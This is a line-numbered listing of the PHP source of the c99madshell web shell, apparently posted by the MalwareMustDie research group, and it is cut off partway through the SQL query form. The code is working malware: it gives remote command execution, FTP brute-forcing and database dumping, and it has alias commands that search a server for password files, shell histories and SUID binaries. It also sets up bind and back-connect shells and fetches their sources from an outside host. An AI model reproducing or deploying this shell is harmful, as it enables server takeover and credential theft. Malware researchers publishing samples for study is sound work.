MalwareMustDie

1. ＜?phpif (!function_exists("getmicrotime"))
2. {
3. function getmicrotime()
4. {
5. list($usec, $sec) ＝ explode(" ", microtime());
6. return ((float)$usec + (float)$sec);
7. }
8. }
9. error_reporting(5);
10. @ignore_user_abort(TRUE);
11. @set_magic_quotes_runtime(0);
12. $win ＝ strtolower(substr(PHP_OS,0,3)) ＝＝ "win";
13. define("starttime",getmicrotime());
14. if (get_magic_quotes_gpc())
15. {
16. if (!function_exists("strips"))
17. {
18. function strips(&$arr,$k＝"")
19. {
20. if (is_array($arr))
21. {
22. foreach($arr as $k＝＞$v)
23. {
24. if (strtoupper($k) !＝ "GLOBALS")
25. {
26. strips($arr["$k"]);
27. }
28. }
29. }
30. else
31. {
32. $arr ＝ stripslashes($arr);
33. }
34. }
35. }
36. strips($GLOBALS);
37. }
38. $_REQUEST ＝ array_merge($_COOKIE,$_POST);
39. foreach($_REQUEST as $k＝＞$v)
40. {
41. if (!isset($$k))
42. {
43. $$k ＝ $v;
44. }
45. }
46. $shver ＝ "2.0 madnet edition";
47. if (empty($surl))
48. {
49. $surl ＝ $_SERVER['PHP_SELF'];
50. }
51. $surl ＝ htmlspecialchars($surl);
52. $timelimit ＝ 0;
53. $host_allow ＝ array("*");
54. $login_txt ＝ "Admin area";
55. $accessdeniedmess ＝ "＜a href＝\"http://securityprobe.net\"＞c99madshell v.".$shver."＜/a＞: access denied";
56. $gzipencode ＝ TRUE;
57. $c99sh_sourcesurl ＝ "http://ccteam.ru/files/c99sh_sources/";
58. //Sources-server$filestealth ＝ TRUE;
59. $donated_html ＝ "＜center＞＜b＞Owned by root＜/b＞＜/center＞";
60. $donated_act ＝ array("");
61. $curdir ＝ "./";
62. $tmpdir ＝ "";
63. $tmpdir_log ＝ "./";
64. $log_email ＝ "user@host.gov";
65. $sort_default ＝ "0a";
66. $sort_save ＝ TRUE;
67. $ftypes ＝ array( "html"＝＞array("html","htm","shtml"), "txt"＝＞array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"＝＞array("sh","install","bat","cmd"), "ini"＝＞array("ini","inf"), "code"＝＞array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"＝＞array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"＝＞array("sdb"), "phpsess"＝＞array("sess"), "download"＝＞array("exe","com","pif","src","lnk","zip","rar","gz","tar"));
68. $exeftypes ＝ array( getenv("PHPRC")." -q %f%" ＝＞ array("php","php3","php4"), "perl %f%" ＝＞ array("pl","cgi"));
69. $regxp_highlight ＝ array( array(basename($_SERVER["PHP_SELF"]),1,"＜font color＝\"yellow\"＞","＜/font＞"), array("config.php",1) // example);
70. $safemode_diskettes ＝ array("a");
71. $hexdump_lines ＝ 8;
72. $hexdump_rows ＝ 24;
73. $nixpwdperpage ＝ 100;
74. $bindport_pass ＝ "c99mad";
75. $bindport_port ＝ "31373";
76. $bc_port ＝ "31373";
77. $datapipe_localport ＝ "8081";
78. if (!$win)
79. {
80. $cmdaliases ＝ array( array("-----------------------------------------------------------", "ls -la"), array("find all suid files", "find / -type f -perm -04000 -ls"), array("find suid files in current dir", "find . -type f -perm -04000 -ls"), array("find all sgid files", "find / -type f -perm -02000 -ls"), array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("find config.inc.php files", "find / -type f -name config.inc.php"), array("find config* files", "find / -type f -name \"config*\""), array("find config* files in current dir", "find . -type f -name \"config*\""), array("find all writable folders and files", "find / -perm -2 -ls"), array("find all writable folders and files in current dir", "find . -perm -2 -ls"), array("find all service.pwd files", "find / -type f -name service.pwd"), array("find service.pwd files in current dir", "find . -type f -name service.pwd"), array("find all .htpasswd files", "find / -type f -name .htpasswd"), array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("find all .bash_history files", "find / -type f -name .bash_history"), array("find .bash_history files in current dir", "find . -type f -name .bash_history"), array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("list file attributes on a Linux second extended file system", "lsattr -va"), array("show opened ports", "netstat -an | grep -i listen") );
81. }
82. else
83. {
84. $cmdaliases ＝ array( array("-----------------------------------------------------------", "dir"), array("show opened ports", "netstat -an") );
85. }
86. $sess_cookie ＝ "c99shvars";
87. $usefsbuff ＝ TRUE;
88. $copy_unset ＝ FALSE;
89. $quicklaunch ＝ array( array("＜b＞＜hr＞HOME＜/b＞",$surl), array("＜b＞＜＝＜/b＞","#\" onclick＝\"history.back(1)"), array("＜b＞＝＞＜/b＞","#\" onclick＝\"history.go(1)"), array("＜b＞UPDIR＜/b＞","#\" onclick＝\"document.todo.act.value＝'ls';document.todo.d.value＝'%upd';document.todo.sort.value＝'%sort';document.todo.submit();"), array("＜b＞Search＜/b＞","#\" onclick＝\"document.todo.act.value＝'search';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞Buffer＜/b＞","#\" onclick＝\"document.todo.act.value＝'fsbuff';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞Tools＜/b＞","#\" onclick＝\"document.todo.act.value＝'tools';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞Proc.＜/b＞","#\" onclick＝\"document.todo.act.value＝'processes';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞FTP brute＜/b＞","#\" onclick＝\"document.todo.act.value＝'ftpquickbrute';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞Sec.＜/b＞","#\" onclick＝\"document.todo.act.value＝'security';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞SQL＜/b＞","#\" onclick＝\"document.todo.act.value＝'sql';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞PHP-code＜/b＞","#\" onclick＝\"document.todo.act.value＝'eval';document.todo.d.value＝'%d';document.todo.submit();"), array("＜b＞Self remove＜/b＞","#\" onclick＝\"document.todo.act.value＝'selfremove';document.todo.submit();"), array("＜b＞Logout＜/b＞","#\" onclick＝\"if (confirm('Are you sure?')) window.close()"));
90. $highlight_background ＝ "#c0c0c0";
91. $highlight_bg ＝ "#FFFFFF";
92. $highlight_comment ＝ "#6A6A6A";
93. $highlight_default ＝ "#0000BB";
94. $highlight_html ＝ "#1300FF";
95. $highlight_keyword ＝ "#007700";
96. $highlight_string ＝ "#000000";
97. @$f ＝ $_REQUEST["f"];
98. @extract($_REQUEST["c99shcook"]);
99. /////////////////////////////////////@set_time_limit(0);
100. $tmp ＝ array();
101. foreach($host_allow as $k＝＞$v)
102. {
103. $tmp[] ＝ str_replace("\\*",".*",preg_quote($v));
104. }
105. $s ＝ "!^(".implode("|",$tmp).")$!i";
106. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR"))))
107. {
108. exit("＜a href＝\"http://securityprobe.net\"＞c99madshell＜/a＞: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");
109. }
110. if (!empty($login))
111. {
112. if (empty($md5_pass))
113. {
114. $md5_pass ＝ md5($pass);
115. }
116. if (($_SERVER["PHP_AUTH_USER"] !＝ $login) or (md5($_SERVER["PHP_AUTH_PW"]) !＝ $md5_pass))
117. {
118. if (empty($login_txt))
119. {
120. $login_txt ＝ strip_tags(ereg_replace(" |＜br＞"," ",$donated_html));
121. }
122. header("WWW-Authenticate: Basic realm＝\"c99shell ".$shver.": ".$login_txt."\"");
123. header("HTTP/1.0 401 Unauthorized");
124. exit($accessdeniedmess);
125. }
126. }
127. if (isset($_POST['act'])) $act ＝ $_POST['act'];
128. if (isset($_POST['d'])) $d ＝ urldecode($_POST['d']);
129. if (isset($_POST['sort'])) $sort ＝ $_POST['sort'];
130. if (isset($_POST['f'])) $f ＝ $_POST['f'];
131. if (isset($_POST['ft'])) $ft ＝ $_POST['ft'];
132. if (isset($_POST['grep'])) $grep ＝ $_POST['grep'];
133. if (isset($_POST['processes_sort'])) $processes_sort ＝ $_POST['processes_sort'];
134. if (isset($_POST['pid'])) $pid ＝ $_POST['pid'];
135. if (isset($_POST['sig'])) $sig ＝ $_POST['sig'];
136. if (isset($_POST['base64'])) $base64 ＝ $_POST['base64'];
137. if (isset($_POST['fullhexdump'])) $fullhexdump ＝ $_POST['fullhexdump'];
138. if (isset($_POST['c'])) $c ＝ $_POST['c'];
139. if (isset($_POST['white'])) $white ＝ $_POST['white'];
140. if (isset($_POST['nixpasswd'])) $nixpasswd ＝ $_POST['nixpasswd'];
141. $lastdir ＝ realpath(".");
142. chdir($curdir);
143. $sess_data ＝ unserialize($_COOKIE["$sess_cookie"]);
144. if (!is_array($sess_data))
145. {
146. $sess_data ＝ array();
147. }
148. if (!is_array($sess_data["copy"]))
149. {
150. $sess_data["copy"] ＝ array();
151. }
152. if (!is_array($sess_data["cut"]))
153. {
154. $sess_data["cut"] ＝ array();
155. }
156. $disablefunc ＝ @ini_get("disable_functions");
157. if (!empty($disablefunc))
158. {
159. $disablefunc ＝ str_replace(" ","",$disablefunc);
160. $disablefunc ＝ explode(",",$disablefunc);
161. }
162. if (!function_exists("c99_buff_prepare"))
163. {
164. function c99_buff_prepare()
165. {
166. global $sess_data;
167. global $act;
168. foreach($sess_data["copy"] as $k＝＞$v)
169. {
170. $sess_data["copy"][$k] ＝ str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
171. }
172. foreach($sess_data["cut"] as $k＝＞$v)
173. {
174. $sess_data["cut"][$k] ＝ str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));
175. }
176. $sess_data["copy"] ＝ array_unique($sess_data["copy"]);
177. $sess_data["cut"] ＝ array_unique($sess_data["cut"]);
178. sort($sess_data["copy"]);
179. sort($sess_data["cut"]);
180. if ($act !＝ "copy")
181. {
182. foreach($sess_data["cut"] as $k＝＞$v)
183. {
184. if ($sess_data["copy"][$k] ＝＝ $v)
185. {
186. unset($sess_data["copy"][$k]);
187. }
188. }
189. }
190. else
191. {
192. foreach($sess_data["copy"] as $k＝＞$v)
193. {
194. if ($sess_data["cut"][$k] ＝＝ $v)
195. {
196. unset($sess_data["cut"][$k]);
197. }
198. }
199. }
200. }
201. }
202. c99_buff_prepare();
203. if (!function_exists("c99_sess_put"))
204. {
205. function c99_sess_put($data)
206. {
207. global $sess_cookie;
208. global $sess_data;
209. c99_buff_prepare();
210. $sess_data ＝ $data;
211. $data ＝ serialize($data);
212. setcookie($sess_cookie,$data);
213. }
214. }
215. foreach (array("sort","sql_sort") as $v)
216. {
217. if (!empty($_POST[$v]))
218. {
219. $$v ＝ $_POST[$v];
220. }
221. }
222. if ($sort_save)
223. {
224. if (!empty($sort))
225. {
226. setcookie("sort",$sort);
227. }
228. if (!empty($sql_sort))
229. {
230. setcookie("sql_sort",$sql_sort);
231. }
232. }
233. if (!function_exists("str2mini"))
234. {
235. function str2mini($content,$len)
236. {
237. if (strlen($content) ＞ $len)
238. {
239. $len ＝ ceil($len/2) - 2;
240. return substr($content, 0,$len)."...".substr($content,-$len);
241. }
242. else
243. {
244. return $content;
245. }
246. }
247. }
248. if (!function_exists("view_size"))
249. {
250. function view_size($size)
251. {
252. if (!is_numeric($size))
253. {
254. return FALSE;
255. }
256. else
257. {
258. if ($size ＞＝ 1073741824)
259. {
260. $size ＝ round($size/1073741824*100)/100 ." GB";
261. }
262. elseif ($size ＞＝ 1048576)
263. {
264. $size ＝ round($size/1048576*100)/100 ." MB";
265. }
266. elseif ($size ＞＝ 1024)
267. {
268. $size ＝ round($size/1024*100)/100 ." KB";
269. }
270. else
271. {
272. $size ＝ $size . " B";
273. }
274. return $size;
275. }
276. }
277. }
278. if (!function_exists("fs_copy_dir"))
279. {
280. function fs_copy_dir($d,$t)
281. {
282. $d ＝ str_replace("\\",DIRECTORY_SEPARATOR,$d);
283. if (substr($d,-1) !＝ DIRECTORY_SEPARATOR)
284. {
285. $d .＝ DIRECTORY_SEPARATOR;
286. }
287. $h ＝ opendir($d);
288. while (($o ＝ readdir($h)) !＝＝ FALSE)
289. {
290. if (($o !＝ ".") and ($o !＝ ".."))
291. {
292. if (!is_dir($d.DIRECTORY_SEPARATOR.$o))
293. {
294. $ret ＝ copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);
295. }
296. else
297. {
298. $ret ＝ mkdir($t.DIRECTORY_SEPARATOR.$o);
299. fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);
300. }
301. if (!$ret)
302. {
303. return $ret;
304. }
305. }
306. }
307. closedir($h);
308. return TRUE;
309. }
310. }
311. if (!function_exists("fs_copy_obj"))
312. {
313. function fs_copy_obj($d,$t)
314. {
315. $d ＝ str_replace("\\",DIRECTORY_SEPARATOR,$d);
316. $t ＝ str_replace("\\",DIRECTORY_SEPARATOR,$t);
317. if (!is_dir(dirname($t)))
318. {
319. mkdir(dirname($t));
320. }
321. if (is_dir($d))
322. {
323. if (substr($d,-1) !＝ DIRECTORY_SEPARATOR)
324. {
325. $d .＝ DIRECTORY_SEPARATOR;
326. }
327. if (substr($t,-1) !＝ DIRECTORY_SEPARATOR)
328. {
329. $t .＝ DIRECTORY_SEPARATOR;
330. }
331. return fs_copy_dir($d,$t);
332. }
333. elseif (is_file($d))
334. {
335. return copy($d,$t);
336. }
337. else
338. {
339. return FALSE;
340. }
341. }
342. }
343. if (!function_exists("fs_move_dir"))
344. {
345. function fs_move_dir($d,$t)
346. {
347. $h ＝ opendir($d);
348. if (!is_dir($t))
349. {
350. mkdir($t);
351. }
352. while (($o ＝ readdir($h)) !＝＝ FALSE)
353. {
354. if (($o !＝ ".") and ($o !＝ ".."))
355. {
356. $ret ＝ TRUE;
357. if (!is_dir($d.DIRECTORY_SEPARATOR.$o))
358. {
359. $ret ＝ copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);
360. }
361. else
362. {
363. if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o))
364. {
365. $ret ＝ FALSE;
366. }
367. }
368. if (!$ret)
369. {
370. return $ret;
371. }
372. }
373. }
374. closedir($h);
375. return TRUE;
376. }
377. }
378. if (!function_exists("fs_move_obj"))
379. {
380. function fs_move_obj($d,$t)
381. {
382. $d ＝ str_replace("\\",DIRECTORY_SEPARATOR,$d);
383. $t ＝ str_replace("\\",DIRECTORY_SEPARATOR,$t);
384. if (is_dir($d))
385. {
386. if (substr($d,-1) !＝ DIRECTORY_SEPARATOR)
387. {
388. $d .＝ DIRECTORY_SEPARATOR;
389. }
390. if (substr($t,-1) !＝ DIRECTORY_SEPARATOR)
391. {
392. $t .＝ DIRECTORY_SEPARATOR;
393. }
394. return fs_move_dir($d,$t);
395. }
396. elseif (is_file($d))
397. {
398. if(copy($d,$t))
399. {
400. return unlink($d);
401. }
402. else
403. {
404. unlink($t);
405. return FALSE;
406. }
407. }
408. else
409. {
410. return FALSE;
411. }
412. }
413. }
414. if (!function_exists("fs_rmdir"))
415. {
416. function fs_rmdir($d)
417. {
418. $h ＝ opendir($d);
419. while (($o ＝ readdir($h)) !＝＝ FALSE)
420. {
421. if (($o !＝ ".") and ($o !＝ ".."))
422. {
423. if (!is_dir($d.$o))
424. {
425. unlink($d.$o);
426. }
427. else
428. {
429. fs_rmdir($d.$o.DIRECTORY_SEPARATOR);
430. rmdir($d.$o);
431. }
432. }
433. }
434. closedir($h);
435. rmdir($d);
436. return !is_dir($d);
437. }
438. }
439. if (!function_exists("fs_rmobj"))
440. {
441. function fs_rmobj($o)
442. {
443. $o ＝ str_replace("\\",DIRECTORY_SEPARATOR,$o);
444. if (is_dir($o))
445. {
446. if (substr($o,-1) !＝ DIRECTORY_SEPARATOR)
447. {
448. $o .＝ DIRECTORY_SEPARATOR;
449. }
450. return fs_rmdir($o);
451. }
452. elseif (is_file($o))
453. {
454. return unlink($o);
455. }
456. else
457. {
458. return FALSE;
459. }
460. }
461. }
462. if (!function_exists("myshellexec"))
463. {
464. function myshellexec($cmd)
465. {
466. global $disablefunc;
467. $result ＝ "";
468. if (!empty($cmd))
469. {
470. if (is_callable("exec") and !in_array("exec",$disablefunc))
471. {
472. exec($cmd,$result);
473. $result ＝ join("\n",$result);
474. }
475. elseif (($result ＝ `$cmd`) !＝＝ FALSE)
476. {
477. }
478. elseif (is_callable("system") and !in_array("system",$disablefunc))
479. {
480. $v ＝ @ob_get_contents();
481. @ob_clean();
482. system($cmd);
483. $result ＝ @ob_get_contents();
484. @ob_clean();
485. echo $v;
486. }
487. elseif (is_callable("passthru") and !in_array("passthru",$disablefunc))
488. {
489. $v ＝ @ob_get_contents();
490. @ob_clean();
491. passthru($cmd);
492. $result ＝ @ob_get_contents();
493. @ob_clean();
494. echo $v;
495. }
496. elseif (is_resource($fp ＝ popen($cmd,"r")))
497. {
498. $result ＝ "";
499. while(!feof($fp))
500. {
501. $result .＝ fread($fp,1024);
502. }
503. pclose($fp);
504. }
505. }
506. return $result;
507. }
508. }
509. if (!function_exists("tabsort"))
510. {
511. function tabsort($a,$b)
512. {
513. global $v;
514. return strnatcmp($a[$v], $b[$v]);
515. }
516. }
517. if (!function_exists("view_perms"))
518. {
519. function view_perms($mode)
520. {
521. if (($mode & 0xC000) ＝＝＝ 0xC000)
522. {
523. $type ＝ "s";
524. }
525. elseif (($mode & 0x4000) ＝＝＝ 0x4000)
526. {
527. $type ＝ "d";
528. }
529. elseif (($mode & 0xA000) ＝＝＝ 0xA000)
530. {
531. $type ＝ "l";
532. }
533. elseif (($mode & 0x8000) ＝＝＝ 0x8000)
534. {
535. $type ＝ "-";
536. }
537. elseif (($mode & 0x6000) ＝＝＝ 0x6000)
538. {
539. $type ＝ "b";
540. }
541. elseif (($mode & 0x2000) ＝＝＝ 0x2000)
542. {
543. $type ＝ "c";
544. }
545. elseif (($mode & 0x1000) ＝＝＝ 0x1000)
546. {
547. $type ＝ "p";
548. }
549. else
550. {
551. $type ＝ "?";
552. }
553. $owner["read"] ＝ ($mode & 00400)?"r":"-";
554. $owner["write"] ＝ ($mode & 00200)?"w":"-";
555. $owner["execute"] ＝ ($mode & 00100)?"x":"-";
556. $group["read"] ＝ ($mode & 00040)?"r":"-";
557. $group["write"] ＝ ($mode & 00020)?"w":"-";
558. $group["execute"] ＝ ($mode & 00010)?"x":"-";
559. $world["read"] ＝ ($mode & 00004)?"r":"-";
560. $world["write"] ＝ ($mode & 00002)? "w":"-";
561. $world["execute"] ＝ ($mode & 00001)?"x":"-";
562. if ($mode & 0x800)
563. {
564. $owner["execute"] ＝ ($owner["execute"] ＝＝ "x")?"s":"S";
565. }
566. if ($mode & 0x400)
567. {
568. $group["execute"] ＝ ($group["execute"] ＝＝ "x")?"s":"S";
569. }
570. if ($mode & 0x200)
571. {
572. $world["execute"] ＝ ($world["execute"] ＝＝ "x")?"t":"T";
573. }
574. return $type.join("",$owner).join("",$group).join("",$world);
575. }
576. }
577. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc))
578. {
579. function posix_getpwuid($uid)
580. {
581. return FALSE;
582. }
583. }
584. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc))
585. {
586. function posix_getgrgid($gid)
587. {
588. return FALSE;
589. }
590. }
591. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc))
592. {
593. function posix_kill($gid)
594. {
595. return FALSE;
596. }
597. }
598. if (!function_exists("parse_perms"))
599. {
600. function parse_perms($mode)
601. {
602. if (($mode & 0xC000) ＝＝＝ 0xC000)
603. {
604. $t ＝ "s";
605. }
606. elseif (($mode & 0x4000) ＝＝＝ 0x4000)
607. {
608. $t ＝ "d";
609. }
610. elseif (($mode & 0xA000) ＝＝＝ 0xA000)
611. {
612. $t ＝ "l";
613. }
614. elseif (($mode & 0x8000) ＝＝＝ 0x8000)
615. {
616. $t ＝ "-";
617. }
618. elseif (($mode & 0x6000) ＝＝＝ 0x6000)
619. {
620. $t ＝ "b";
621. }
622. elseif (($mode & 0x2000) ＝＝＝ 0x2000)
623. {
624. $t ＝ "c";
625. }
626. elseif (($mode & 0x1000) ＝＝＝ 0x1000)
627. {
628. $t ＝ "p";
629. }
630. else
631. {
632. $t ＝ "?";
633. }
634. $o["r"] ＝ ($mode & 00400) ＞ 0;
635. $o["w"] ＝ ($mode & 00200) ＞ 0;
636. $o["x"] ＝ ($mode & 00100) ＞ 0;
637. $g["r"] ＝ ($mode & 00040) ＞ 0;
638. $g["w"] ＝ ($mode & 00020) ＞ 0;
639. $g["x"] ＝ ($mode & 00010) ＞ 0;
640. $w["r"] ＝ ($mode & 00004) ＞ 0;
641. $w["w"] ＝ ($mode & 00002) ＞ 0;
642. $w["x"] ＝ ($mode & 00001) ＞ 0;
643. return array("t"＝＞$t,"o"＝＞$o,"g"＝＞$g,"w"＝＞$w);
644. }
645. }
646. if (!function_exists("parsesort"))
647. {
648. function parsesort($sort)
649. {
650. $one ＝ intval($sort);
651. $second ＝ substr($sort,-1);
652. if ($second !＝ "d")
653. {
654. $second ＝ "a";
655. }
656. return array($one,$second);
657. }
658. }
659. if (!function_exists("view_perms_color"))
660. {
661. function view_perms_color($o)
662. {
663. if (!is_readable($o))
664. {
665. return "＜font color＝red＞".view_perms(fileperms($o))."＜/font＞";
666. }
667. elseif (!is_writable($o))
668. {
669. return "＜font color＝white＞".view_perms(fileperms($o))."＜/font＞";
670. }
671. else
672. {
673. return "＜font color＝green＞".view_perms(fileperms($o))."＜/font＞";
674. }
675. }
676. }
677. if (!function_exists("c99getsource"))
678. {
679. function c99getsource($fn)
680. {
681. global $c99sh_sourcesurl;
682. $array ＝ array( "c99sh_bindport.pl" ＝＞ "c99sh_bindport_pl.txt", "c99sh_bindport.c" ＝＞ "c99sh_bindport_c.txt", "c99sh_backconn.pl" ＝＞ "c99sh_backconn_pl.txt", "c99sh_backconn.c" ＝＞ "c99sh_backconn_c.txt", "c99sh_datapipe.pl" ＝＞ "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" ＝＞ "c99sh_datapipe_c.txt", );
683. $name ＝ $array[$fn];
684. if ($name)
685. {
686. return file_get_contents($c99sh_sourcesurl.$name);
687. }
688. else
689. {
690. return FALSE;
691. }
692. }
693. }
694. if (!function_exists("mysql_dump"))
695. {
696. function mysql_dump($set)
697. {
698. global $shver;
699. $sock ＝ $set["sock"];
700. $db ＝ $set["db"];
701. $print ＝ $set["print"];
702. $nl2br ＝ $set["nl2br"];
703. $file ＝ $set["file"];
704. $add_drop ＝ $set["add_drop"];
705. $tabs ＝ $set["tabs"];
706. $onlytabs ＝ $set["onlytabs"];
707. $ret ＝ array();
708. $ret["err"] ＝ array();
709. if (!is_resource($sock))
710. {
711. echo("Error: \$sock is not valid resource.");
712. }
713. if (empty($db))
714. {
715. $db ＝ "db";
716. }
717. if (empty($print))
718. {
719. $print ＝ 0;
720. }
721. if (empty($nl2br))
722. {
723. $nl2br ＝ 0;
724. }
725. if (empty($add_drop))
726. {
727. $add_drop ＝ TRUE;
728. }
729. if (empty($file))
730. {
731. $file ＝ $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
732. }
733. if (!is_array($tabs))
734. {
735. $tabs ＝ array();
736. }
737. if (empty($add_drop))
738. {
739. $add_drop ＝ TRUE;
740. }
741. if (sizeof($tabs) ＝＝ 0)
742. {
743. // retrive tables-list $res ＝ mysql_query("SHOW TABLES FROM ".$db, $sock);
744. if (mysql_num_rows($res) ＞ 0)
745. {
746. while ($row ＝ mysql_fetch_row($res))
747. {
748. $tabs[] ＝ $row[0];
749. }
750. }
751. }
752. $out ＝ "# Dumped by C99madShell.SQL v. ".$shver."# Home page: http://securityprobe.net## Host settings:# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."# Date: ".date("d.m.Y H:i:s")."# DB: \"".$db."\"#---------------------------------------------------------";
753. $c ＝ count($onlytabs);
754. foreach($tabs as $tab)
755. {
756. if ((in_array($tab,$onlytabs)) or (!$c))
757. {
758. if ($add_drop)
759. {
760. $out .＝ "DROP TABLE IF EXISTS `".$tab."`;\n";
761. }
762. // recieve query for create table structure $res ＝ mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
763. if (!$res)
764. {
765. $ret["err"][] ＝ mysql_smarterror();
766. }
767. else
768. {
769. $row ＝ mysql_fetch_row($res);
770. $out .＝ $row["1"].";\n\n";
771. // recieve table variables $res ＝ mysql_query("SELECT * FROM `$tab`", $sock);
772. if (mysql_num_rows($res) ＞ 0)
773. {
774. while ($row ＝ mysql_fetch_assoc($res))
775. {
776. $keys ＝ implode("`, `", array_keys($row));
777. $values ＝ array_values($row);
778. foreach($values as $k＝＞$v)
779. {
780. $values[$k] ＝ addslashes($v);
781. }
782. $values ＝ implode("', '", $values);
783. $sql ＝ "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
784. $out .＝ $sql;
785. }
786. }
787. }
788. }
789. }
790. $out .＝ "#---------------------------------------------------------------------------------\n\n";
791. if ($file)
792. {
793. $fp ＝ fopen($file, "w");
794. if (!$fp)
795. {
796. $ret["err"][] ＝ 2;
797. }
798. else
799. {
800. fwrite ($fp, $out);
801. fclose ($fp);
802. }
803. }
804. if ($print)
805. {
806. if ($nl2br)
807. {
808. echo nl2br($out);
809. }
810. else
811. {
812. echo $out;
813. }
814. }
815. return $out;
816. }
817. }
818. if (!function_exists("mysql_buildwhere"))
819. {
820. function mysql_buildwhere($array,$sep＝" and",$functs＝array())
821. {
822. if (!is_array($array))
823. {
824. $array ＝ array();
825. }
826. $result ＝ "";
827. foreach($array as $k＝＞$v)
828. {
829. $value ＝ "";
830. if (!empty($functs[$k]))
831. {
832. $value .＝ $functs[$k]."(";
833. }
834. $value .＝ "'".addslashes($v)."'";
835. if (!empty($functs[$k]))
836. {
837. $value .＝ ")";
838. }
839. $result .＝ "`".$k."` ＝ ".$value.$sep;
840. }
841. $result ＝ substr($result,0,strlen($result)-strlen($sep));
842. return $result;
843. }
844. }
845. if (!function_exists("mysql_fetch_all"))
846. {
847. function mysql_fetch_all($query,$sock)
848. {
849. if ($sock)
850. {
851. $result ＝ mysql_query($query,$sock);
852. }
853. else
854. {
855. $result ＝ mysql_query($query);
856. }
857. $array ＝ array();
858. while ($row ＝ mysql_fetch_array($result))
859. {
860. $array[] ＝ $row;
861. }
862. mysql_free_result($result);
863. return $array;
864. }
865. }
866. if (!function_exists("mysql_smarterror"))
867. {
868. function mysql_smarterror($type,$sock)
869. {
870. if ($sock)
871. {
872. $error ＝ mysql_error($sock);
873. }
874. else
875. {
876. $error ＝ mysql_error();
877. }
878. $error ＝ htmlspecialchars($error);
879. return $error;
880. }
881. }
882. if (!function_exists("mysql_query_form"))
883. {
884. function mysql_query_form()
885. {
886. global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
887. $sql_query ＝ urldecode($sql_query);
888. if (($submit) and (!$sql_query_result) and ($sql_confirm))
889. {
890. if (!$sql_query_error)
891. {
892. $sql_query_error ＝ "Query was empty";
893. }
894. echo "＜b＞Error:＜/b＞ ＜br＞".$sql_query_error."＜br＞";
895. }
896. if ($sql_query_result or (!$sql_confirm))
897. {
898. $sql_act ＝ $sql_goto;
899. }
900. if ((!$submit) or ($sql_act))
901. {
902. echo "＜table border＝0＞＜tr＞＜td＞＜form method＝POST＞＜b＞"; if (($sql_query) and (!$submit))
903. {
904. echo "Do you really want to";
905. }
906. else
907. {
908. echo "SQL-Query";
909. }
910. echo ":＜/b＞＜br＞＜br＞＜textarea name＝sql_query cols＝100 rows＝10＞".htmlspecialchars($sql_query)."
911.  
912. #MalwareMustDie!!!